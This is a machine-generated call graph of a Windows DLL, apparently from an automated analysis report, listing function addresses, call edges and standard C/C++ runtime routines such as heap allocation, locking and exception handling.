6d411902 _free 20 API calls 15794->15797 15796 6d41c163 15795->15796 15798 6d411902 _free 20 API calls 15795->15798 15799 6d41c175 15796->15799 15800 6d411902 _free 20 API calls 15796->15800 15797->15795 15798->15796 15801 6d41c187 15799->15801 15802 6d411902 _free 20 API calls 15799->15802 15800->15799 15803 6d41c199 15801->15803 15805 6d411902 _free 20 API calls 15801->15805 15802->15801 15804 6d41c1ab 15803->15804 15806 6d411902 _free 20 API calls 15803->15806 15807 6d411902 _free 20 API calls 15804->15807 15809 6d41c1bd 15804->15809 15805->15803 15806->15804 15807->15809 15808 6d41c1cf 15811 6d41c1e1 15808->15811 15813 6d411902 _free 20 API calls 15808->15813 15809->15808 15810 6d411902 _free 20 API calls 15809->15810 15810->15808 15812 6d41c1f3 15811->15812 15814 6d411902 _free 20 API calls 15811->15814 15815 6d41c205 15812->15815 15816 6d411902 _free 20 API calls 15812->15816 15813->15811 15814->15812 15817 6d41c217 15815->15817 15818 6d411902 _free 20 API calls 15815->15818 15816->15815 15819 6d411902 _free 20 API calls 15817->15819 15817->15820 15818->15817 15819->15820 15820->15771 15822 6d41c5f5 15821->15822 15832 6d41c64d 15821->15832 15823 6d411902 _free 20 API calls 15822->15823 15824 6d41c605 15822->15824 15823->15824 15825 6d41c617 15824->15825 15826 6d411902 _free 20 API calls 15824->15826 15827 6d41c629 15825->15827 15828 6d411902 _free 20 API calls 15825->15828 15826->15825 15829 6d41c63b 15827->15829 15830 6d411902 _free 20 API calls 15827->15830 15828->15827 15831 6d411902 _free 20 API calls 15829->15831 15829->15832 15830->15829 15831->15832 15832->15773 15834 6d41ab16 15833->15834 15838 6d41ab34 15833->15838 15834->15838 15839 6d41cb22 15834->15839 15837 6d411902 _free 20 API calls 15837->15838 15838->15788 15840 6d41ab2e 15839->15840 15841 6d41cb33 15839->15841 15840->15837 15842 6d41c86c __Getctype 20 API calls 15841->15842 15843 6d41cb3b 15842->15843 15844 6d41c86c __Getctype 20 API calls 15843->15844 15845 6d41cb46 15844->15845 15846 6d41c86c __Getctype 20 API calls 15845->15846 15847 6d41cb51 15846->15847 15848 6d41c86c __Getctype 20 API calls 15847->15848 15849 6d41cb5c 15848->15849 15850 6d41c86c __Getctype 20 API calls 15849->15850 15851 6d41cb6a 15850->15851 15852 6d411902 _free 20 API calls 15851->15852 15853 6d41cb75 15852->15853 15854 6d411902 _free 20 API calls 15853->15854 15855 6d41cb80 15854->15855 15856 6d411902 _free 20 API calls 15855->15856 15857 6d41cb8b 15856->15857 15858 6d41c86c __Getctype 20 API calls 15857->15858 15859 6d41cb99 15858->15859 15860 6d41c86c __Getctype 20 API calls 15859->15860 15861 6d41cba7 15860->15861 15862 6d41c86c __Getctype 20 API calls 15861->15862 15863 6d41cbb8 15862->15863 15864 6d41c86c __Getctype 20 API calls 15863->15864 15865 6d41cbc6 15864->15865 15866 6d41c86c __Getctype 20 API calls 15865->15866 15867 6d41cbd4 15866->15867 15868 6d411902 _free 20 API calls 15867->15868 15869 6d41cbdf 15868->15869 15870 6d411902 _free 20 API calls 15869->15870 15871 6d41cbea 15870->15871 15872 6d411902 _free 20 API calls 15871->15872 15873 6d41cbf5 15872->15873 15874 6d411902 _free 20 API calls 15873->15874 15874->15840 15875->15764 15879 6d4120a4 GetLastError 15876->15879 15880 6d4120c3 15879->15880 15881 6d4120bd 15879->15881 15882 6d414e98 _unexpected 11 API calls 15880->15882 15904 6d4120c9 15880->15904 15883 6d414e42 _unexpected 11 API calls 15881->15883 15884 6d4120ea 15882->15884 15883->15880 15885 6d4120ce SetLastError 15884->15885 15905 6d414939 15884->15905 15887 6d40de2b GetLastError 15885->15887 15887->15735 15889 6d41214e SetLastError 15889->15887 15890 6d412102 15892 6d414e98 _unexpected 11 API calls 15890->15892 15891 6d412117 15893 6d414e98 _unexpected 11 API calls 15891->15893 15894 6d41210e 15892->15894 15895 6d412123 15893->15895 15900 6d411902 _free 17 API calls 15894->15900 15896 6d412127 15895->15896 15897 6d412136 15895->15897 15898 6d414e98 _unexpected 11 API calls 15896->15898 15912 6d411d52 15897->15912 15898->15894 15902 6d412114 15900->15902 15902->15885 15903 6d411902 _free 17 API calls 15903->15904 15904->15885 15904->15889 15910 6d414946 _unexpected 15905->15910 15906 6d414986 15909 6d40de26 _free 19 API calls 15906->15909 15907 6d414971 HeapAlloc 15908 6d4120fa 15907->15908 15907->15910 15908->15890 15908->15891 15909->15908 15910->15906 15910->15907 15917 6d40fe75 15910->15917 15928 6d411c0e 15912->15928 15914 6d411dc0 15934 6d411d02 15914->15934 15916 6d411de9 15916->15903 15922 6d40feb9 15917->15922 15919 6d40fe8b 15920 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15919->15920 15921 6d40feb5 15920->15921 15921->15910 15923 6d40fec5 ___scrt_is_nonwritable_in_current_image 15922->15923 15924 6d40d447 std::_Lockit::_Lockit EnterCriticalSection 15923->15924 15925 6d40fed0 15924->15925 15926 6d40ff02 codecvt LeaveCriticalSection 15925->15926 15927 6d40fef7 _Fputc 15926->15927 15927->15919 15929 6d411c1a ___scrt_is_nonwritable_in_current_image 15928->15929 15942 6d40d447 EnterCriticalSection 15929->15942 15931 6d411c24 15943 6d411c4a 15931->15943 15933 6d411c42 _Fputc 15933->15914 15935 6d411d0e ___scrt_is_nonwritable_in_current_image 15934->15935 15946 6d40d447 EnterCriticalSection 15935->15946 15937 6d411d18 15938 6d411edd _unexpected 20 API calls 15937->15938 15939 6d411d30 15938->15939 15947 6d411d46 15939->15947 15941 6d411d3e _Fputc 15941->15916 15942->15931 15944 6d40d48f std::_Lockit::~_Lockit LeaveCriticalSection 15943->15944 15945 6d411c54 15944->15945 15945->15933 15946->15937 15948 6d40d48f std::_Lockit::~_Lockit LeaveCriticalSection 15947->15948 15949 6d411d50 15948->15949 15949->15941 15951 6d40a96a 15950->15951 15957 6d40800d 15950->15957 15952 6d40a978 15951->15952 15958 6d40bb9b 15951->15958 15954 6d40bbd6 ___vcrt_FlsSetValue 6 API calls 15952->15954 15955 6d40a988 15954->15955 15963 6d40a941 15955->15963 15957->15467 15959 6d40badc ___vcrt_FlsSetValue 5 API calls 15958->15959 15960 6d40bbb5 15959->15960 15961 6d40bbcd TlsGetValue 15960->15961 15962 6d40bbc1 15960->15962 15961->15962 15962->15952 15964 6d40a94b 15963->15964 15966 6d40a958 15963->15966 15964->15966 15967 6d40d143 15964->15967 15966->15957 15968 6d411902 _free 20 API calls 15967->15968 15969 6d40d15b 15968->15969 15969->15966 15976 6d40a9a1 15970->15976 15972 6d407fe9 15972->15494 15973 6d410e05 15972->15973 15974 6d4120a4 _free 20 API calls 15973->15974 15975 6d407ff5 15974->15975 15975->15497 15975->15498 15977 6d40a9aa 15976->15977 15978 6d40a9ad GetLastError 15976->15978 15977->15972 15979 6d40bb9b ___vcrt_FlsGetValue 6 API calls 15978->15979 15980 6d40a9c2 15979->15980 15981 6d40a9e1 15980->15981 15982 6d40aa27 SetLastError 15980->15982 15983 6d40bbd6 ___vcrt_FlsSetValue 6 API calls 15980->15983 15981->15982 15982->15972 15984 6d40a9db __Getctype 15983->15984 15984->15981 15985 6d40aa03 15984->15985 15986 6d40bbd6 ___vcrt_FlsSetValue 6 API calls 15984->15986 15987 6d40bbd6 ___vcrt_FlsSetValue 6 API calls 15985->15987 15988 6d40aa17 15985->15988 15986->15985 15987->15988 15989 6d40d143 ___std_exception_copy 20 API calls 15988->15989 15989->15981 15991 6d4024d6 15990->15991 15992 6d4025cb 15990->15992 16037 6d4011c0 15991->16037 15992->15518 15992->15521 15994 6d4024df 15995 6d4011c0 __DllMainCRTStartup@12 2 API calls 15994->15995 15998 6d4024f3 15995->15998 15996 6d402547 15997 6d4011c0 __DllMainCRTStartup@12 2 API calls 15996->15997 15999 6d40255a 15997->15999 15998->15996 16000 6d4011c0 __DllMainCRTStartup@12 2 API calls 15998->16000 16042 6d404670 15999->16042 16000->15998 16006 6d402578 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16007 6d404670 __DllMainCRTStartup@12 28 API calls 16006->16007 16008 6d4025aa 16007->16008 16009 6d4025e0 __DllMainCRTStartup@12 74 API calls 16008->16009 16010 6d4025b1 16009->16010 16011 6d404670 __DllMainCRTStartup@12 28 API calls 16010->16011 16012 6d4025bd 16011->16012 16013 6d404910 __DllMainCRTStartup@12 74 API calls 16012->16013 16014 6d4025c3 16013->16014 16068 6d402230 16014->16068 16017 6d408049 ___scrt_release_startup_lock 16016->16017 16018 6d40804d 16017->16018 16022 6d408059 __DllMainCRTStartup@12 16017->16022 16863 6d410c46 16018->16863 16021 6d408066 16021->15506 16022->16021 16866 6d410271 16022->16866 16948 6d40a91e InterlockedFlushSList 16025->16948 16029 6d4081f1 16028->16029 16030 6d407cf6 16029->16030 16952 6d410e18 16029->16952 16034 6d407d32 16030->16034 16032 6d4081ff 16033 6d40a8c3 ___scrt_uninitialize_crt 7 API calls 16032->16033 16033->16030 17068 6d408067 16034->17068 16129 6d4057f1 16037->16129 16041 6d4011df __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 16041->15994 16043 6d4046b1 16042->16043 16049 6d404722 16043->16049 16145 6d4042c0 16043->16145 16046 6d4048c4 16047 6d40256b 16046->16047 16155 6d404380 16046->16155 16050 6d4025e0 16047->16050 16134 6d401f30 16049->16134 16051 6d402625 16050->16051 16053 6d4042c0 __DllMainCRTStartup@12 28 API calls 16051->16053 16054 6d402640 16051->16054 16052 6d402696 16055 6d401f30 std::ios_base::_Init 28 API calls 16052->16055 16053->16054 16054->16052 16333 6d4049b0 16054->16333 16057 6d402743 16055->16057 16058 6d404380 __DllMainCRTStartup@12 28 API calls 16057->16058 16059 6d402572 16057->16059 16058->16059 16060 6d404910 16059->16060 16061 6d40494d 16060->16061 16596 6d4044f0 16061->16596 16066 6d4042c0 __DllMainCRTStartup@12 28 API calls 16067 6d40499e 16066->16067 16067->16006 16069 6d403550 std::ios_base::_Init 28 API calls 16068->16069 16070 6d402280 16069->16070 16071 6d403550 std::ios_base::_Init 28 API calls 16070->16071 16072 6d4022af 16071->16072 16073 6d403550 std::ios_base::_Init 28 API calls 16072->16073 16074 6d4022db 16073->16074 16075 6d403550 std::ios_base::_Init 28 API calls 16074->16075 16076 6d402307 16075->16076 16077 6d404670 __DllMainCRTStartup@12 28 API calls 16076->16077 16078 6d40231a 16077->16078 16079 6d404910 __DllMainCRTStartup@12 74 API calls 16078->16079 16080 6d402320 16079->16080 16740 6d402000 16080->16740 16082 6d40232b 16083 6d404670 __DllMainCRTStartup@12 28 API calls 16082->16083 16084 6d40233a 16083->16084 16085 6d404910 __DllMainCRTStartup@12 74 API calls 16084->16085 16086 6d402340 Sleep 16085->16086 16087 6d402000 __DllMainCRTStartup@12 83 API calls 16086->16087 16088 6d402356 16087->16088 16089 6d404670 __DllMainCRTStartup@12 28 API calls 16088->16089 16090 6d402365 16089->16090 16091 6d404910 __DllMainCRTStartup@12 74 API calls 16090->16091 16092 6d40236b Sleep 16091->16092 16093 6d402000 __DllMainCRTStartup@12 83 API calls 16092->16093 16094 6d402381 16093->16094 16095 6d404670 __DllMainCRTStartup@12 28 API calls 16094->16095 16096 6d402390 16095->16096 16097 6d404910 __DllMainCRTStartup@12 74 API calls 16096->16097 16100 6d402396 error_info_injector 16097->16100 16098 6d4024b0 16099 6d40d335 std::ios_base::_Init 26 API calls 16098->16099 16103 6d4024b5 16099->16103 16100->16098 16101 6d40248d error_info_injector 16100->16101 16102 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16101->16102 16104 6d4024ac 16102->16104 16105 6d4025cb 16103->16105 16106 6d4011c0 __DllMainCRTStartup@12 2 API calls 16103->16106 16104->15992 16105->15992 16107 6d4024df 16106->16107 16108 6d4011c0 __DllMainCRTStartup@12 2 API calls 16107->16108 16111 6d4024f3 16108->16111 16109 6d402547 16110 6d4011c0 __DllMainCRTStartup@12 2 API calls 16109->16110 16112 6d40255a 16110->16112 16111->16109 16113 6d4011c0 __DllMainCRTStartup@12 2 API calls 16111->16113 16114 6d404670 __DllMainCRTStartup@12 28 API calls 16112->16114 16113->16111 16115 6d40256b 16114->16115 16116 6d4025e0 __DllMainCRTStartup@12 74 API calls 16115->16116 16117 6d402572 16116->16117 16118 6d404910 __DllMainCRTStartup@12 74 API calls 16117->16118 16119 6d402578 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16118->16119 16120 6d404670 __DllMainCRTStartup@12 28 API calls 16119->16120 16121 6d4025aa 16120->16121 16122 6d4025e0 __DllMainCRTStartup@12 74 API calls 16121->16122 16123 6d4025b1 16122->16123 16124 6d404670 __DllMainCRTStartup@12 28 API calls 16123->16124 16125 6d4025bd 16124->16125 16126 6d404910 __DllMainCRTStartup@12 74 API calls 16125->16126 16127 6d4025c3 16126->16127 16128 6d402230 __DllMainCRTStartup@12 83 API calls 16127->16128 16128->16105 16130 6d405802 __DllMainCRTStartup@12 16129->16130 16131 6d4011d3 16130->16131 16132 6d405808 QueryPerformanceFrequency 16130->16132 16133 6d4057da QueryPerformanceCounter 16131->16133 16132->16131 16133->16041 16135 6d401f52 16134->16135 16136 6d401f4a 16134->16136 16135->16046 16138 6d401f62 std::ios_base::_Init 16136->16138 16159 6d409071 16136->16159 16162 6d401e50 16138->16162 16140 6d401f98 16141 6d409071 Concurrency::cancel_current_task RaiseException 16140->16141 16142 6d401fa7 16141->16142 16180 6d408fcd 16142->16180 16146 6d404349 16145->16146 16147 6d4042f9 16145->16147 16148 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16146->16148 16329 6d403340 16147->16329 16150 6d40437b 16148->16150 16150->16049 16152 6d404331 16152->16146 16154 6d404380 __DllMainCRTStartup@12 28 API calls 16152->16154 16153 6d401f30 std::ios_base::_Init 28 API calls 16153->16152 16154->16146 16156 6d4043e9 16155->16156 16157 6d4043be 16155->16157 16156->16047 16157->16156 16158 6d401f30 std::ios_base::_Init 28 API calls 16157->16158 16158->16156 16160 6d4090b8 RaiseException 16159->16160 16161 6d40908b 16159->16161 16160->16138 16161->16160 16163 6d401eb0 16162->16163 16163->16163 16188 6d403550 16163->16188 16165 6d401ec4 16203 6d401540 16165->16203 16167 6d401efe error_info_injector 16167->16140 16168 6d401ed8 16168->16167 16230 6d40d335 16168->16230 16181 6d408fda 16180->16181 16187 6d401fd4 16180->16187 16182 6d40d4bd ___std_exception_copy 21 API calls 16181->16182 16181->16187 16183 6d408ff7 16182->16183 16186 6d409007 16183->16186 16317 6d410e96 16183->16317 16185 6d40d143 ___std_exception_copy 20 API calls 16185->16187 16186->16185 16187->16046 16191 6d40356e _Yarn 16188->16191 16193 6d403594 16188->16193 16189 6d40367e 16246 6d401440 16189->16246 16191->16165 16192 6d403683 16251 6d401370 16192->16251 16193->16189 16195 6d4035e8 16193->16195 16196 6d40360d 16193->16196 16195->16192 16235 6d407b01 16195->16235 16199 6d407b01 codecvt 28 API calls 16196->16199 16201 6d4035f9 _Yarn 16196->16201 16197 6d403688 error_info_injector 16197->16165 16199->16201 16200 6d40d335 std::ios_base::_Init 26 API calls 16200->16189 16201->16200 16202 6d403660 error_info_injector 16201->16202 16202->16165 16204 6d4015ab 16203->16204 16205 6d4015e3 16204->16205 16206 6d40160a 16204->16206 16213 6d4015b5 _Yarn 16204->16213 16208 6d4017e9 16205->16208 16209 6d4015ee 16205->16209 16211 6d407b01 codecvt 28 API calls 16206->16211 16206->16213 16207 6d401656 16218 6d404d40 std::ios_base::_Init 28 API calls 16207->16218 16221 6d4016bf _Yarn 16207->16221 16212 6d401370 Concurrency::cancel_current_task 28 API calls 16208->16212 16210 6d407b01 codecvt 28 API calls 16209->16210 16210->16213 16211->16213 16214 6d4017ee 16212->16214 16213->16207 16216 6d4017f3 16213->16216 16277 6d404d40 16213->16277 16217 6d40d335 std::ios_base::_Init 26 API calls 16214->16217 16219 6d40d335 std::ios_base::_Init 26 API calls 16216->16219 16217->16216 16218->16221 16220 6d4017f8 16219->16220 16292 6d409030 16220->16292 16221->16214 16223 6d40171b error_info_injector 16221->16223 16224 6d408fcd ___std_exception_copy 27 API calls 16223->16224 16226 6d40177c 16224->16226 16225 6d401815 error_info_injector 16225->16168 16226->16216 16227 6d4017ab error_info_injector 16226->16227 16228 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16227->16228 16229 6d4017e0 16228->16229 16229->16168 16296 6d40d2aa 16230->16296 16232 6d40d344 16307 6d40d352 IsProcessorFeaturePresent 16232->16307 16234 6d40d351 16238 6d407b06 16235->16238 16237 6d407b20 16237->16201 16238->16237 16239 6d40fe75 codecvt 7 API calls 16238->16239 16241 6d401370 Concurrency::cancel_current_task 16238->16241 16257 6d40d4bd 16238->16257 16239->16238 16240 6d407b2c 16240->16240 16241->16240 16242 6d409071 Concurrency::cancel_current_task RaiseException 16241->16242 16243 6d40138c 16242->16243 16244 6d408fcd ___std_exception_copy 27 API calls 16243->16244 16245 6d4013b3 16244->16245 16245->16201 16264 6d4059dd 16246->16264 16252 6d40137e Concurrency::cancel_current_task 16251->16252 16253 6d409071 Concurrency::cancel_current_task RaiseException 16252->16253 16254 6d40138c 16253->16254 16255 6d408fcd ___std_exception_copy 27 API calls 16254->16255 16256 6d4013b3 16255->16256 16256->16197 16262 6d41193c _unexpected 16257->16262 16258 6d41197a 16260 6d40de26 _free 20 API calls 16258->16260 16259 6d411965 HeapAlloc 16261 6d411978 16259->16261 16259->16262 16260->16261 16261->16238 16262->16258 16262->16259 16263 6d40fe75 codecvt 7 API calls 16262->16263 16263->16262 16269 6d405900 16264->16269 16267 6d409071 Concurrency::cancel_current_task RaiseException 16268 6d4059fc 16267->16268 16272 6d401270 16269->16272 16273 6d408fcd ___std_exception_copy 27 API calls 16272->16273 16274 6d4012a7 16273->16274 16275 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16274->16275 16276 6d4012b7 16275->16276 16276->16267 16278 6d404d6b 16277->16278 16279 6d404e8e 16277->16279 16283 6d404db2 16278->16283 16284 6d404ddc 16278->16284 16280 6d401440 std::ios_base::_Init 28 API calls 16279->16280 16281 6d404e93 16280->16281 16282 6d401370 Concurrency::cancel_current_task 28 API calls 16281->16282 16290 6d404dc3 _Yarn 16282->16290 16283->16281 16285 6d404dbd 16283->16285 16287 6d407b01 codecvt 28 API calls 16284->16287 16284->16290 16286 6d407b01 codecvt 28 API calls 16285->16286 16286->16290 16287->16290 16288 6d40d335 std::ios_base::_Init 26 API calls 16289 6d404e9d 16288->16289 16290->16288 16291 6d404e4c _Yarn error_info_injector 16290->16291 16291->16207 16293 6d409044 16292->16293 16294 6d40903d 16292->16294 16293->16225 16295 6d40d143 ___std_exception_copy 20 API calls 16294->16295 16295->16293 16297 6d4120a4 _free 20 API calls 16296->16297 16298 6d40d2c0 16297->16298 16299 6d40d31f 16298->16299 16302 6d40d2ce 16298->16302 16300 6d40d352 __Getctype 11 API calls 16299->16300 16301 6d40d324 16300->16301 16303 6d40d2aa _Fputc 26 API calls 16301->16303 16304 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16302->16304 16305 6d40d331 16303->16305 16306 6d40d2f5 16304->16306 16305->16232 16306->16232 16308 6d40d35e 16307->16308 16311 6d40d160 16308->16311 16312 6d40d17c __InternalCxxFrameHandler __cftof 16311->16312 16313 6d40d1a8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16312->16313 16315 6d40d279 __InternalCxxFrameHandler 16313->16315 16314 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16316 6d40d297 GetCurrentProcess TerminateProcess 16314->16316 16315->16314 16316->16234 16318 6d410ea3 16317->16318 16319 6d410eb1 16317->16319 16318->16319 16321 6d410ec8 16318->16321 16320 6d40de26 _free 20 API calls 16319->16320 16325 6d410eb9 16320->16325 16323 6d410ec3 16321->16323 16324 6d40de26 _free 20 API calls 16321->16324 16323->16186 16324->16325 16326 6d40d325 16325->16326 16327 6d40d2aa _Fputc 26 API calls 16326->16327 16328 6d40d331 16327->16328 16328->16323 16330 6d40337c 16329->16330 16331 6d403397 16330->16331 16332 6d4042c0 __DllMainCRTStartup@12 28 API calls 16330->16332 16331->16152 16331->16153 16332->16331 16352 6d405856 16333->16352 16336 6d405856 std::_Lockit::_Lockit 7 API calls 16338 6d404a0b 16336->16338 16337 6d404a2b __DllMainCRTStartup@12 16344 6d407b01 codecvt 28 API calls 16337->16344 16351 6d404a69 16337->16351 16358 6d4058ae 16338->16358 16339 6d4058ae std::_Lockit::~_Lockit 2 API calls 16340 6d404ade 16339->16340 16342 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16340->16342 16343 6d404af8 16342->16343 16343->16052 16345 6d404a74 16344->16345 16365 6d401a30 16345->16365 16351->16339 16353 6d405865 16352->16353 16354 6d40586c 16352->16354 16394 6d40d4a6 16353->16394 16356 6d4049eb 16354->16356 16399 6d4076cc EnterCriticalSection 16354->16399 16356->16336 16356->16337 16359 6d40d4b4 16358->16359 16360 6d4058b8 16358->16360 16452 6d40d48f LeaveCriticalSection 16359->16452 16364 6d4058cb 16360->16364 16451 6d4076da LeaveCriticalSection 16360->16451 16363 6d40d4bb 16363->16337 16364->16337 16366 6d405856 std::_Lockit::_Lockit 7 API calls 16365->16366 16367 6d401a60 16366->16367 16368 6d401ac6 16367->16368 16369 6d401aa8 16367->16369 16462 6d405a1d 16368->16462 16453 6d405cce 16369->16453 16374 6d401ae0 16592 6d405d19 16374->16592 16377 6d401b1b 16379 6d40d143 ___std_exception_copy 20 API calls 16377->16379 16380 6d401b32 16377->16380 16378 6d40d143 ___std_exception_copy 20 API calls 16378->16377 16379->16380 16381 6d401b49 16380->16381 16382 6d40d143 ___std_exception_copy 20 API calls 16380->16382 16383 6d401b60 16381->16383 16384 6d40d143 ___std_exception_copy 20 API calls 16381->16384 16382->16381 16385 6d401b77 16383->16385 16386 6d40d143 ___std_exception_copy 20 API calls 16383->16386 16384->16383 16387 6d401b8e 16385->16387 16388 6d40d143 ___std_exception_copy 20 API calls 16385->16388 16386->16385 16389 6d4058ae std::_Lockit::~_Lockit 2 API calls 16387->16389 16388->16387 16390 6d401b9f 16389->16390 16391 6d405b9c 16390->16391 16392 6d407b01 codecvt 28 API calls 16391->16392 16393 6d405ba7 16392->16393 16393->16351 16400 6d415168 16394->16400 16399->16356 16421 6d414a6d 16400->16421 16420 6d41519a 16420->16420 16422 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16421->16422 16423 6d414a83 16422->16423 16424 6d414a87 16423->16424 16425 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16424->16425 16426 6d414a9d 16425->16426 16427 6d414aa1 16426->16427 16428 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16427->16428 16429 6d414ab7 16428->16429 16430 6d414abb 16429->16430 16431 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16430->16431 16432 6d414ad1 16431->16432 16433 6d414ad5 16432->16433 16434 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16433->16434 16435 6d414aeb 16434->16435 16436 6d414aef 16435->16436 16437 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16436->16437 16438 6d414b05 16437->16438 16439 6d414b09 16438->16439 16440 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16439->16440 16441 6d414b1f 16440->16441 16442 6d414b23 16441->16442 16443 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16442->16443 16444 6d414b39 16443->16444 16445 6d414b57 16444->16445 16446 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16445->16446 16447 6d414b6d 16446->16447 16448 6d414b3d 16447->16448 16449 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16448->16449 16450 6d414b53 16449->16450 16450->16420 16451->16364 16452->16363 16467 6d40d720 16453->16467 16457 6d405cf2 16458 6d405d02 16457->16458 16459 6d40d720 std::_Locinfo::_Locinfo_dtor 70 API calls 16457->16459 16460 6d405b26 _Yarn 21 API calls 16458->16460 16459->16458 16461 6d401aaf 16460->16461 16461->16374 16589 6d405974 16462->16589 16465 6d409071 Concurrency::cancel_current_task RaiseException 16466 6d405a3c 16465->16466 16468 6d415168 std::_Locinfo::_Locinfo_dtor 5 API calls 16467->16468 16469 6d40d72d 16468->16469 16478 6d40d4c8 16469->16478 16471 6d405cda 16472 6d405b26 16471->16472 16473 6d405b34 16472->16473 16477 6d405b5f _Yarn 16472->16477 16474 6d405b40 16473->16474 16475 6d40d143 ___std_exception_copy 20 API calls 16473->16475 16476 6d40d4bd ___std_exception_copy 21 API calls 16474->16476 16474->16477 16475->16474 16476->16477 16477->16457 16479 6d40d4d4 ___scrt_is_nonwritable_in_current_image 16478->16479 16486 6d40d447 EnterCriticalSection 16479->16486 16481 6d40d4e2 16487 6d40d519 16481->16487 16485 6d40d500 _Fputc 16485->16471 16486->16481 16512 6d40d683 16487->16512 16489 6d40d533 16506 6d40d4ef 16489->16506 16535 6d411f56 GetLastError 16489->16535 16491 6d40d545 16562 6d41571b 16491->16562 16496 6d40d352 __Getctype 11 API calls 16497 6d40d682 16496->16497 16498 6d41571b std::_Locinfo::_Locinfo_dtor 41 API calls 16499 6d40d5ad 16498->16499 16500 6d40d5b4 16499->16500 16501 6d40d5d6 16499->16501 16502 6d40d571 16500->16502 16503 6d40d5be 16500->16503 16505 6d411902 _free 20 API calls 16501->16505 16507 6d40d601 16501->16507 16502->16496 16502->16506 16504 6d411902 _free 20 API calls 16503->16504 16504->16506 16505->16507 16509 6d40d50d 16506->16509 16507->16506 16508 6d411902 _free 20 API calls 16507->16508 16508->16506 16588 6d40d48f LeaveCriticalSection 16509->16588 16511 6d40d517 16511->16485 16513 6d40d69d 16512->16513 16514 6d40d68f 16512->16514 16516 6d415472 __cftoe 41 API calls 16513->16516 16515 6d41358b std::_Locinfo::_Locinfo_dtor 66 API calls 16514->16515 16526 6d40d699 16515->16526 16517 6d40d6b4 16516->16517 16518 6d40d6f7 16517->16518 16519 6d414939 _unexpected 20 API calls 16517->16519 16520 6d40d352 __Getctype 11 API calls 16518->16520 16521 6d40d6cf 16519->16521 16522 6d40d71f 16520->16522 16523 6d40d702 16521->16523 16525 6d415472 __cftoe 41 API calls 16521->16525 16527 6d415168 std::_Locinfo::_Locinfo_dtor 5 API calls 16522->16527 16524 6d411902 _free 20 API calls 16523->16524 16524->16526 16528 6d40d6e6 16525->16528 16526->16489 16531 6d40d72d 16527->16531 16529 6d40d6f9 16528->16529 16530 6d40d6ed 16528->16530 16532 6d41358b std::_Locinfo::_Locinfo_dtor 66 API calls 16529->16532 16530->16518 16530->16523 16533 6d40d4c8 std::_Locinfo::_Locinfo_dtor 70 API calls 16531->16533 16532->16523 16534 6d40d756 16533->16534 16534->16489 16536 6d411f72 16535->16536 16537 6d411f6c 16535->16537 16539 6d414e98 _unexpected 11 API calls 16536->16539 16544 6d411f78 16536->16544 16538 6d414e42 _unexpected 11 API calls 16537->16538 16538->16536 16540 6d411f8c 16539->16540 16541 6d411ffd SetLastError 16540->16541 16542 6d414939 _unexpected 20 API calls 16540->16542 16543 6d40f989 IsInExceptionSpec 36 API calls 16541->16543 16546 6d411f9c 16542->16546 16548 6d412009 16543->16548 16544->16541 16545 6d411f7d 16544->16545 16547 6d411ff1 SetLastError 16544->16547 16545->16541 16549 6d411fa4 16546->16549 16550 6d411fb9 16546->16550 16547->16491 16551 6d414e98 _unexpected 11 API calls 16549->16551 16552 6d414e98 _unexpected 11 API calls 16550->16552 16553 6d411fb0 16551->16553 16554 6d411fc5 16552->16554 16558 6d411902 _free 20 API calls 16553->16558 16555 6d411fc9 16554->16555 16556 6d411fd8 16554->16556 16559 6d414e98 _unexpected 11 API calls 16555->16559 16557 6d411d52 _unexpected 20 API calls 16556->16557 16560 6d411fe3 16557->16560 16558->16545 16559->16553 16561 6d411902 _free 20 API calls 16560->16561 16561->16544 16563 6d415732 16562->16563 16564 6d415764 16563->16564 16567 6d415736 16563->16567 16565 6d40de26 _free 20 API calls 16564->16565 16566 6d415769 16565->16566 16568 6d40d325 _Fputc 26 API calls 16566->16568 16569 6d415777 16567->16569 16570 6d415757 16567->16570 16577 6d40d56a 16568->16577 16571 6d415492 std::_Locinfo::_Locinfo_dtor 41 API calls 16569->16571 16572 6d40de26 _free 20 API calls 16570->16572 16573 6d415784 16571->16573 16574 6d41575c 16572->16574 16575 6d41578c 16573->16575 16579 6d41579c 16573->16579 16576 6d40d325 _Fputc 26 API calls 16574->16576 16578 6d40de26 _free 20 API calls 16575->16578 16576->16577 16577->16502 16581 6d41193c 16577->16581 16578->16577 16579->16577 16580 6d40de26 _free 20 API calls 16579->16580 16580->16574 16582 6d41197a 16581->16582 16587 6d41194a _unexpected 16581->16587 16584 6d40de26 _free 20 API calls 16582->16584 16583 6d411965 HeapAlloc 16585 6d40d590 16583->16585 16583->16587 16584->16585 16585->16498 16585->16506 16586 6d40fe75 codecvt 7 API calls 16586->16587 16587->16582 16587->16583 16587->16586 16588->16511 16590 6d401270 std::invalid_argument::invalid_argument 27 API calls 16589->16590 16591 6d405986 16590->16591 16591->16465 16593 6d401b0b 16592->16593 16594 6d405d25 16592->16594 16593->16377 16593->16378 16595 6d40d720 std::_Locinfo::_Locinfo_dtor 70 API calls 16594->16595 16595->16593 16597 6d405856 std::_Lockit::_Lockit 7 API calls 